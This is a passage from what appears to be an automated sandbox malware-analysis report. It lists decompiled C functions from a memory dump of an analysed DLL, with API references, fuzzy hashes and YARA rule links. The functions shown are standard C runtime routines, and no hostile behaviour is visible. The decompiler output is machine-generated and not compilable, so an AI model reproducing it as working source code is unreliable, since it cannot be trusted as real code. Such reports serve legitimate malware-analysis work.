				_t2 =  *0x6e218190; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6E1D461A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6E1D16BE(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6E1D461A(__eflags,  *0x6e218190, _t18);
							if(__eflags != 0) {
								E6E1CF3E7(_t18, 0x6e222078);
								E6E1D1BE4(0);
								goto L13;
							} else {
								_t13 = 0;
								E6E1D461A(__eflags,  *0x6e218190, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6E1D461A(0,  *0x6e218190, 0);
							_push(0);
							L9:
							E6E1D1BE4();
							goto L4;
						}
					}
				} else {
					_t18 = E6E1D45DB(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6e218190; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6e1cf8ab
0x6e1cf8ad
0x6e1cf8b2
0x6e1cf8b5
0x6e1cf8d3
0x6e1cf8d6
0x6e1cf8db
0x6e1cf8dd
0x00000000
0x6e1cf8df
0x6e1cf8eb
0x6e1cf8ef
0x6e1cf8f1
0x6e1cf916
0x6e1cf918
0x6e1cf931
0x6e1cf938
0x00000000
0x6e1cf91a
0x6e1cf91a
0x6e1cf923
0x6e1cf928
0x00000000
0x6e1cf928
0x6e1cf8f3
0x6e1cf8f3
0x6e1cf8f3
0x6e1cf8fc
0x6e1cf901
0x6e1cf902
0x6e1cf902
0x00000000
0x6e1cf907
0x6e1cf8f1
0x6e1cf8b7
0x6e1cf8bd
0x6e1cf8c1
0x6e1cf8ce
0x00000000
0x6e1cf8c3
0x6e1cf8c6
0x6e1cf940
0x6e1cf940
0x6e1cf8c8
0x6e1cf8c8
0x6e1cf8c8
0x6e1cf8ca
0x6e1cf8ca
0x6e1cf8ca
0x6e1cf8c6
0x6e1cf8c1
0x6e1cf943
0x6e1cf94b
0x6e1cf954

APIs

GetLastError.KERNEL32(00000000,6E17DCEA,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386,?,00000000), ref: 6E1CF8A5
_free.LIBCMT ref: 6E1CF902
_free.LIBCMT ref: 6E1CF938
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6E1C23F9,6E1D1C61,00000001,?,6E1A963B,6E17DCEA,?,6E186103,00000054,00000000,6E184386), ref: 6E1CF943

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3dd4d1e97175dc0a8e4eb0548552863fdddb8d72fbcc94e1e233b366b01ab54e
Instruction ID: 165bf86af381295ff886f847db01daa110407d2c9303d727f47f51b3eac91406
Opcode Fuzzy Hash: 3dd4d1e97175dc0a8e4eb0548552863fdddb8d72fbcc94e1e233b366b01ab54e
Instruction Fuzzy Hash: CA11C6332049012B9A005EF94C85E9A25AFABF6B797350625F335C21C0DF258DC9B123

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B4D, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1E6B4D(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6e218970, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6E1E6B36();
					E6E1E6AF8();
					_t13 = WriteConsoleW( *0x6e218970, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6e1e6b6a
0x6e1e6b6e
0x6e1e6b7b
0x6e1e6b80
0x6e1e6b9b
0x6e1e6b9b
0x6e1e6ba1

APIs

WriteConsoleW.KERNEL32(?,?,6E1C30A1,00000000,?,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001), ref: 6E1E6B64
GetLastError.KERNEL32(?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000,00000001,?,6E1D5D03,6E1C2E1A), ref: 6E1E6B70

Part of subcall function 6E1E6B36: CloseHandle.KERNEL32(FFFFFFFE,6E1E6B80,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000,00000001), ref: 6E1E6B46

___initconout.LIBCMT ref: 6E1E6B80

Part of subcall function 6E1E6AF8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E1E6B27,6E1E3448,00000001,?,6E1D579E,00000000,00000000,00000001,00000000), ref: 6E1E6B0B

WriteConsoleW.KERNEL32(?,?,6E1C30A1,00000000,?,6E1E345B,?,00000001,?,00000001,?,6E1D579E,00000000,00000000,00000001,00000000), ref: 6E1E6B95

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction ID: d97d8df498956f06a3ea0116ce9f6a935fcdc9b55cb856018c40bd61c93195b1
Opcode Fuzzy Hash: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction Fuzzy Hash: 7EF01C3A620918BBCF625FD1CC089CD3F26FB093A1B448411FF1895520CB32C9A0EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A95D3, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E1A95D3(long _a4) {
				long _t3;
				intOrPtr* _t7;

				_t7 =  *0x6e221798;
				if(_t7 == 0) {
					LeaveCriticalSection(0x6e221780);
					_t3 = WaitForSingleObjectEx( *0x6e22177c, _a4, 0);
					EnterCriticalSection(0x6e221780);
					return _t3;
				}
				 *0x6e1ee1b4(0x6e221778, 0x6e221780, _a4);
				return  *_t7();
			}

0x6e1a95d7
0x6e1a95df
0x6e1a9600
0x6e1a9611
0x6e1a9618
0x00000000
0x6e1a9618
0x6e1a95f0
0x00000000

APIs

SleepConditionVariableCS.KERNELBASE(?,6E1A9558,00000064), ref: 6E1A95F6
LeaveCriticalSection.KERNEL32(6E221780,?,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9600
WaitForSingleObjectEx.KERNEL32(?,00000000,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9611
EnterCriticalSection.KERNEL32(6E221780,?,6E1A9558,00000064,?,?,?,6E17DF8B,6E238BE4,000000E4), ref: 6E1A9618

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: b3054645320ff14e01dfe4780776db3a0bd5a476c6fa657cdf6466cf0cdd9532
Instruction ID: dacb0d94807f4e2fdc25e6f82f938a2fd061ca05c9bc6dbf80e7fbf009600e86
Opcode Fuzzy Hash: b3054645320ff14e01dfe4780776db3a0bd5a476c6fa657cdf6466cf0cdd9532
Instruction Fuzzy Hash: EFE09235100928AFCF011BD4DC08EED3F16EF4A661B118021F50957100CB225AD4ABE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D02A7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E1D02A7(void* __edx, void* __fp0, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				signed int _v8;
				intOrPtr _v20;
				char _v180;
				short _v202;
				short _v204;
				short _v206;
				signed short _v208;
				signed short _v210;
				signed short _v212;
				char _v468;
				signed int* _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int* _v488;
				signed int _v492;
				signed int _v496;
				char _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				signed int _t91;
				signed int _t92;
				signed int _t94;
				signed int _t95;
				signed int _t97;
				signed int _t102;
				signed short _t103;
				signed short _t105;
				signed int _t107;
				void* _t110;
				signed int _t111;
				signed int _t115;
				intOrPtr _t120;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				signed int _t136;
				char* _t137;
				signed int _t138;
				intOrPtr _t141;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t155;
				signed int* _t156;
				void* _t158;
				signed int* _t164;
				void* _t166;
				void* _t168;
				intOrPtr* _t180;
				signed int _t181;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int* _t193;
				void* _t195;
				signed int _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t203;
				signed int* _t205;
				signed int _t207;
				void* _t208;
				signed int* _t211;
				signed int _t213;
				signed int _t219;
				void* _t220;
				void* _t230;

				_t230 = __fp0;
				_t195 = __edx;
				_t216 = _t219;
				_t220 = _t219 - 0x1fc;
				_t83 =  *0x6e21801c; // 0x57d971a9
				_v8 = _t83 ^ _t219;
				_t151 = _a8;
				_t211 = _a4;
				_v488 = _a24;
				_v496 = _a8;
				_t203 = _a16;
				if(_t211 == 0) {
					L71:
					return E6E1A93EA(_v8 ^ _t216);
				} else {
					_v484 = 0;
					if( *_t211 != 0x43 || _t211[0] != 0) {
						_t89 = E6E1CF749(_t158, _t195, _t230) + 0x50;
						_t13 = _t89 + 0x18; // -56
						_v472 = _t13;
						_t15 = _t89 + 0x122; // 0xd2
						_t153 = _t15;
						_t16 = _t89 + 0x1c; // -52
						_v476 = _t153;
						_v480 = _t16;
						E6E1CFC88(_t153,  &_v512, _t230, _t203, _a20, E6E1CF749(_t158, _t195, _t230) + 0x50);
						_t205 = _t211;
						_t196 = 0;
						__eflags = 0;
						_t164 =  &(_t205[0]);
						do {
							_t91 =  *_t205;
							_t205 =  &(_t205[0]);
							__eflags = _t91;
						} while (_t91 != 0);
						_t207 = _t205 - _t164 >> 1;
						_v492 = _t207;
						__eflags = _t207 - 0x83;
						if(_t207 >= 0x83) {
							L25:
							_t92 = E6E1D4B14();
							__eflags = _t92;
							_t155 = 0 | _t92 == 0x00000000;
							_t94 = E6E1D0062(_t155, _t164, _t196, _t207, _t230,  &_v468, _t211);
							_pop(_t166);
							__eflags = _t94;
							if(_t94 != 0) {
								_t156 = _v472;
								goto L34;
							} else {
								_t137 =  &_v468;
								__eflags = _t155;
								_t156 = _v472;
								_push(_t137);
								_push(_t156);
								_push(_t137);
								if(__eflags == 0) {
									_t138 = E6E1DEECF(_t156, _t166, _t196, _t207, _t211, __eflags, _t230);
								} else {
									_t138 = E6E1DF84E(_t156, _t166, _t196, _t207, _t211, __eflags, _t230);
								}
								_t220 = _t220 + 0xc;
								__eflags = _t138;
								if(_t138 == 0) {
									L34:
									_t95 = E6E1D4871(_t211);
									_push(_t211);
									__eflags = _t95;
									if(_t95 == 0) {
										_push( &_v468);
										_t97 = E6E1D123C(_t156, _t207, _t211, _t230);
										_pop(_t168);
										__eflags = _t97;
										if(_t97 == 0) {
											L68:
											__eflags = 0;
											_t151 = 0;
											goto L69;
										} else {
											_t102 = E6E1D4871( &_v180);
											__eflags = _t102;
											if(_t102 == 0) {
												goto L68;
											} else {
												_t103 = _v212;
												__eflags = _t103;
												if(_t103 == 0) {
													_t105 = E6E1D120D(_t168,  &_v180);
													goto L56;
												} else {
													_t186 = _t103 & 0x0000ffff;
													__eflags = _t186 - 0x41 - 0x19;
													if(_t186 - 0x41 <= 0x19) {
														_t186 = _t186 + 0x20;
														__eflags = _t186;
													}
													_t198 = 0x38;
													__eflags = _t186 - 0x75;
													if(_t186 != 0x75) {
														L51:
														__eflags = _v206 - 0x2d;
														if(_v206 != 0x2d) {
															goto L68;
														} else {
															__eflags = _v204 - _t198;
															if(_v204 != _t198) {
																goto L68;
															} else {
																__eflags = _v202;
																if(_v202 != 0) {
																	goto L68;
																} else {
																	goto L54;
																}
															}
														}
													} else {
														_t187 = _v210 & 0x0000ffff;
														__eflags = _t187 - 0x41 - 0x19;
														if(_t187 - 0x41 <= 0x19) {
															_t187 = _t187 + 0x20;
															__eflags = _t187;
														}
														__eflags = _t187 - 0x74;
														if(_t187 != 0x74) {
															goto L51;
														} else {
															_t188 = _v208 & 0x0000ffff;
															__eflags = _t188 - 0x41 - 0x19;
															if(_t188 - 0x41 <= 0x19) {
																_t188 = _t188 + 0x20;
																__eflags = _t188;
															}
															__eflags = _t188 - 0x66;
															if(_t188 != 0x66) {
																goto L51;
															} else {
																__eflags = _v206 - _t198;
																if(_v206 != _t198) {
																	goto L51;
																} else {
																	__eflags = _v204;
																	if(_v204 == 0) {
																		L54:
																		_t105 = 0xfde9;
																		L56:
																		_t208 = _t207 + 1;
																		_push(_t208);
																		 *_t156 = _t105 & 0x0000ffff;
																		_t151 = _v476;
																		_t107 = E6E1DE6DB(_v476, 0x83, _t211);
																		_t220 = _t220 + 0x10;
																		__eflags = _t107;
																		if(_t107 != 0) {
																			goto L72;
																		} else {
																			_t180 =  &_v180;
																			_t197 = _t180 + 2;
																			do {
																				_t120 =  *_t180;
																				_t180 = _t180 + 2;
																				__eflags = _t120 - _v484;
																			} while (_t120 != _v484);
																			_t181 = _t180 - _t197;
																			__eflags = _t181;
																			_push((_t181 >> 1) + 1);
																			_push( &_v180);
																			goto L60;
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									} else {
										_t134 = E6E1D120D(_t166);
										_t208 = _t207 + 1;
										_push(_t208);
										 *_t156 = _t134 & 0x0000ffff;
										_t151 = _v476;
										_t136 = E6E1DE6DB(_v476, 0x83, _t211);
										_t220 = _t220 + 0x14;
										__eflags = _t136;
										if(_t136 != 0) {
											goto L72;
										} else {
											_push(_t208);
											_push(_t211);
											L60:
											E6E1CFED0(_t151,  &_v512, _t208, _t211);
											goto L61;
										}
									}
								} else {
									_t151 = _v476;
									_push( &_v468);
									E6E1CFFF2(_v476, _t166, _t196, _t207, _t230, _v476, 0x83);
									_t189 =  &_v180;
									_t220 = _t220 + 0xc;
									_t199 = _t189 + 2;
									do {
										_t141 =  *_t189;
										_t189 = _t189 + 2;
										__eflags = _t141 - _v484;
									} while (_t141 != _v484);
									_push((_t189 - _t199 >> 1) + 1);
									E6E1CFF14(_t151,  &_v512, _t207, _t211,  &_v180);
									_t208 = _t207 + 1;
									L61:
									__eflags =  *_t211;
									if( *_t211 == 0) {
										L65:
										__eflags = 0;
										 *_v480 = 0;
										goto L66;
									} else {
										__eflags = _v492 - 0x83;
										if(_v492 >= 0x83) {
											goto L65;
										} else {
											_push(_t208);
											_t130 = E6E1DE6DB(_v480, 0x83, _t211);
											_t220 = _t220 + 0x10;
											__eflags = _t130;
											if(_t130 == 0) {
												goto L66;
											} else {
												goto L72;
											}
										}
									}
								}
							}
						} else {
							_t193 = _t211;
							_t145 = _t153;
							while(1) {
								_t200 =  *_t145;
								__eflags = _t200 -  *_t193;
								if(_t200 !=  *_t193) {
									break;
								}
								__eflags = _t200;
								if(_t200 == 0) {
									L14:
									_t146 = 0;
								} else {
									_t201 =  *((intOrPtr*)(_t145 + 2));
									__eflags = _t201 - _t193[0];
									if(_t201 != _t193[0]) {
										break;
									} else {
										_t145 = _t145 + 4;
										_t193 =  &(_t193[1]);
										__eflags = _t201;
										if(_t201 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								L16:
								__eflags = _t146;
								if(_t146 == 0) {
									L66:
									 *_v488 =  *_v472;
									_t128 = E6E1CB0B9(_v496, _a12, _t151);
									__eflags = _t128;
									if(_t128 != 0) {
										goto L72;
									} else {
										L69:
										E6E1CFCD2(_t151,  &_v512);
										goto L70;
									}
								} else {
									_t147 = _v480;
									_t164 = _t211;
									while(1) {
										_t196 =  *_t147;
										__eflags = _t196 -  *_t164;
										if(_t196 !=  *_t164) {
											break;
										}
										__eflags = _t196;
										if(_t196 == 0) {
											L22:
											_t148 = 0;
										} else {
											_t196 =  *((intOrPtr*)(_t147 + 2));
											__eflags = _t196 - _t164[0];
											if(_t196 != _t164[0]) {
												break;
											} else {
												_t147 = _t147 + 4;
												_t164 =  &(_t164[1]);
												__eflags = _t196;
												if(_t196 != 0) {
													continue;
												} else {
													goto L22;
												}
											}
										}
										L24:
										__eflags = _t148;
										if(_t148 == 0) {
											goto L66;
										} else {
											goto L25;
										}
										goto L85;
									}
									asm("sbb eax, eax");
									_t148 = _t147 | 0x00000001;
									__eflags = _t148;
									goto L24;
								}
								goto L85;
							}
							asm("sbb eax, eax");
							_t146 = _t145 | 0x00000001;
							__eflags = _t146;
							goto L16;
						}
					} else {
						_t149 = E6E1CB0B9(_t151, _a12, 0x6e1f50fc);
						if(_t149 != 0) {
							L72:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6E1C22EF();
							asm("int3");
							_t110 = E6E1AA7D0(0x6e216e08, 8);
							_t213 = _a4;
							__eflags = _t213;
							if(_t213 != 0) {
								_t111 = E6E1C2A05(5);
								_v8 = _v8 & 0x00000000;
								__eflags =  *(_t213 + 4);
								if( *(_t213 + 4) != 0) {
									__eflags = _t111 | 0xffffffff;
									asm("lock xadd [ecx], eax");
									if((_t111 | 0xffffffff) == 0) {
										__eflags =  *(_t213 + 4) - 0x6e218450;
										if( *(_t213 + 4) != 0x6e218450) {
											E6E1D1BE4( *(_t213 + 4));
										}
									}
								}
								_v8 = 0xfffffffe;
								E6E1D071A();
								__eflags =  *_t213;
								if( *_t213 != 0) {
									E6E1C2A05(4);
									_v8 = 1;
									E6E1DD6D3( *_t213);
									_t115 =  *_t213;
									__eflags = _t115;
									if(_t115 != 0) {
										__eflags =  *(_t115 + 0xc);
										if( *(_t115 + 0xc) == 0) {
											__eflags = _t115 - 0x6e218198;
											if(_t115 != 0x6e218198) {
												E6E1DD508(_t115);
											}
										}
									}
									_v8 = 0xfffffffe;
									E6E1D0726();
								}
								_t110 = E6E1D1BE4(_t213);
							}
							 *[fs:0x0] = _v20;
							return _t110;
						} else {
							 *_v488 = _t149;
							L70:
							goto L71;
						}
					}
				}
				L85:
			}

0x6e1d02a7
0x6e1d02a7
0x6e1d02aa
0x6e1d02ac
0x6e1d02b2
0x6e1d02b9
0x6e1d02c0
0x6e1d02c4
0x6e1d02c7
0x6e1d02cf
0x6e1d02d6
0x6e1d02db
0x6e1d0651
0x6e1d065f
0x6e1d02e1
0x6e1d02e5
0x6e1d02eb
0x6e1d031e
0x6e1d0325
0x6e1d0328
0x6e1d032e
0x6e1d032e
0x6e1d0334
0x6e1d0337
0x6e1d033d
0x6e1d034a
0x6e1d034f
0x6e1d0351
0x6e1d0351
0x6e1d0353
0x6e1d0356
0x6e1d0356
0x6e1d0359
0x6e1d035c
0x6e1d035c
0x6e1d0363
0x6e1d0365
0x6e1d036b
0x6e1d0371
0x6e1d03e5
0x6e1d03e5
0x6e1d03ec
0x6e1d03f6
0x6e1d03f9
0x6e1d03ff
0x6e1d0400
0x6e1d0402
0x6e1d047d
0x00000000
0x6e1d0404
0x6e1d0404
0x6e1d040a
0x6e1d040c
0x6e1d0412
0x6e1d0413
0x6e1d0414
0x6e1d0415
0x6e1d041e
0x6e1d0417
0x6e1d0417
0x6e1d0417
0x6e1d0423
0x6e1d0426
0x6e1d0428
0x6e1d0483
0x6e1d0484
0x6e1d0489
0x6e1d048a
0x6e1d048c
0x6e1d04c4
0x6e1d04c5
0x6e1d04cb
0x6e1d04cc
0x6e1d04ce
0x6e1d0640
0x6e1d0640
0x6e1d0642
0x00000000
0x6e1d04d4
0x6e1d04db
0x6e1d04e0
0x6e1d04e2
0x00000000
0x6e1d04e8
0x6e1d04e8
0x6e1d04ef
0x6e1d04f2
0x6e1d0586
0x00000000
0x6e1d04f8
0x6e1d04f8
0x6e1d04fe
0x6e1d0501
0x6e1d0503
0x6e1d0503
0x6e1d0503
0x6e1d0508
0x6e1d0509
0x6e1d050c
0x6e1d054f
0x6e1d054f
0x6e1d0557
0x00000000
0x6e1d055d
0x6e1d055d
0x6e1d0564
0x00000000
0x6e1d056a
0x6e1d056a
0x6e1d0572
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0572
0x6e1d0564
0x6e1d050e
0x6e1d050e
0x6e1d0518
0x6e1d051b
0x6e1d051d
0x6e1d051d
0x6e1d051d
0x6e1d0520
0x6e1d0523
0x00000000
0x6e1d0525
0x6e1d0525
0x6e1d052f
0x6e1d0532
0x6e1d0534
0x6e1d0534
0x6e1d0534
0x6e1d0537
0x6e1d053a
0x00000000
0x6e1d053c
0x6e1d053c
0x6e1d0543
0x00000000
0x6e1d0545
0x6e1d0545
0x6e1d054d
0x6e1d0578
0x6e1d0578
0x6e1d058c
0x6e1d058c
0x6e1d0590
0x6e1d0592
0x6e1d0594
0x6e1d05a0
0x6e1d05a5
0x6e1d05a8
0x6e1d05aa
0x00000000
0x6e1d05b0
0x6e1d05b0
0x6e1d05b6
0x6e1d05b9
0x6e1d05b9
0x6e1d05bc
0x6e1d05bf
0x6e1d05bf
0x6e1d05c8
0x6e1d05c8
0x6e1d05cf
0x6e1d05d6
0x00000000
0x6e1d05d6
0x00000000
0x00000000
0x00000000
0x6e1d054d
0x6e1d0543
0x6e1d053a
0x6e1d0523
0x6e1d050c
0x6e1d04f2
0x6e1d04e2
0x6e1d048e
0x6e1d048e
0x6e1d0493
0x6e1d0497
0x6e1d0499
0x6e1d049b
0x6e1d04a7
0x6e1d04ac
0x6e1d04af
0x6e1d04b1
0x00000000
0x6e1d04b7
0x6e1d04b7
0x6e1d04b8
0x6e1d05d7
0x6e1d05dd
0x00000000
0x6e1d05dd
0x6e1d04b1
0x6e1d042a
0x6e1d042a
0x6e1d0436
0x6e1d043d
0x6e1d0442
0x6e1d0448
0x6e1d044b
0x6e1d044e
0x6e1d044e
0x6e1d0451
0x6e1d0454
0x6e1d0454
0x6e1d0464
0x6e1d0472
0x6e1d0477
0x6e1d05e2
0x6e1d05e4
0x6e1d05e7
0x6e1d060d
0x6e1d0613
0x6e1d0615
0x00000000
0x6e1d05e9
0x6e1d05ee
0x6e1d05f4
0x00000000
0x6e1d05f6
0x6e1d05f6
0x6e1d05ff
0x6e1d0604
0x6e1d0607
0x6e1d0609
0x00000000
0x6e1d060b
0x00000000
0x6e1d060b
0x6e1d0609
0x6e1d05f4
0x6e1d05e7
0x6e1d0428
0x6e1d0373
0x6e1d0373
0x6e1d0375
0x6e1d0377
0x6e1d0377
0x6e1d037a
0x6e1d037d
0x00000000
0x00000000
0x6e1d037f
0x6e1d0382
0x6e1d0399
0x6e1d0399
0x6e1d0384
0x6e1d0384
0x6e1d0388
0x6e1d038c
0x00000000
0x6e1d038e
0x6e1d038e
0x6e1d0391
0x6e1d0394
0x6e1d0397
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d0397
0x6e1d038c
0x6e1d03a2
0x6e1d03a2
0x6e1d03a4
0x6e1d0618
0x6e1d0630
0x6e1d0632
0x6e1d063a
0x6e1d063c
0x00000000
0x6e1d063e
0x6e1d0644
0x6e1d064a
0x00000000
0x6e1d064a
0x6e1d03aa
0x6e1d03aa
0x6e1d03b0
0x6e1d03b2
0x6e1d03b2
0x6e1d03b5
0x6e1d03b8
0x00000000
0x00000000
0x6e1d03ba
0x6e1d03bd
0x6e1d03d4
0x6e1d03d4
0x6e1d03bf
0x6e1d03bf
0x6e1d03c3
0x6e1d03c7
0x00000000
0x6e1d03c9
0x6e1d03c9
0x6e1d03cc
0x6e1d03cf
0x6e1d03d2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d03d2
0x6e1d03c7
0x6e1d03dd
0x6e1d03dd
0x6e1d03df
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1d03df
0x6e1d03d8
0x6e1d03da
0x6e1d03da
0x00000000
0x6e1d03da
0x00000000
0x6e1d03a4
0x6e1d039d
0x6e1d039f
0x6e1d039f
0x00000000
0x6e1d039f
0x6e1d02f3
0x6e1d02fc
0x6e1d0306
0x6e1d0660
0x6e1d0662
0x6e1d0663
0x6e1d0664
0x6e1d0665
0x6e1d0666
0x6e1d0667
0x6e1d066c
0x6e1d0674
0x6e1d0679
0x6e1d067c
0x6e1d067e
0x6e1d0686
0x6e1d068c
0x6e1d0693
0x6e1d0695
0x6e1d0697
0x6e1d069a
0x6e1d069e
0x6e1d06a0
0x6e1d06a7
0x6e1d06ac
0x6e1d06b1
0x6e1d06a7
0x6e1d069e
0x6e1d06b2
0x6e1d06b9
0x6e1d06be
0x6e1d06c1
0x6e1d06c5
0x6e1d06cb
0x6e1d06d4
0x6e1d06da
0x6e1d06dc
0x6e1d06de
0x6e1d06e0
0x6e1d06e4
0x6e1d06e6
0x6e1d06eb
0x6e1d06ee
0x6e1d06f3
0x6e1d06eb
0x6e1d06e4
0x6e1d06f4
0x6e1d06fb
0x6e1d06fb
0x6e1d0701
0x6e1d0706
0x6e1d070a
0x6e1d0716
0x6e1d030c
0x6e1d0312
0x6e1d064f
0x00000000
0x6e1d064f
0x6e1d0306
0x6e1d02eb
0x00000000

APIs

_free.LIBCMT ref: 6E1D06AC
_free.LIBCMT ref: 6E1D0701

Strings

-, xrefs: 6E1D054F

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 625002e60e8624ae8843063a5188743c7d70c9d6006404c1fb6b29db0b2a628e
Instruction ID: 0b4f0d3992dac66cebda40b9651f50a4ff68908df7e418c9d3e282059d06460c
Opcode Fuzzy Hash: 625002e60e8624ae8843063a5188743c7d70c9d6006404c1fb6b29db0b2a628e
Instruction Fuzzy Hash: 85C1047190021A9BDB60DFA4CC50BEE73BAFF65704F2045AAD819D7180FB319AC8EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E194AEE, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 348
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E194AEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t137;
				intOrPtr* _t138;
				intOrPtr* _t143;
				void* _t154;
				signed int _t155;
				void* _t165;
				void* _t168;
				signed int _t171;
				void* _t172;
				void* _t173;
				intOrPtr _t184;
				intOrPtr _t190;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t216;
				signed int _t218;
				intOrPtr _t233;
				intOrPtr* _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				intOrPtr _t248;
				signed int _t252;
				signed int _t253;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t263 = __eflags;
				E6E1A9DF3(0x6e1ec7f4, __ebx, __edi, __esi, 0x6c);
				_t196 =  *((intOrPtr*)(_t262 + 0x10));
				 *(_t262 - 0x6c) =  *(_t262 + 0xc);
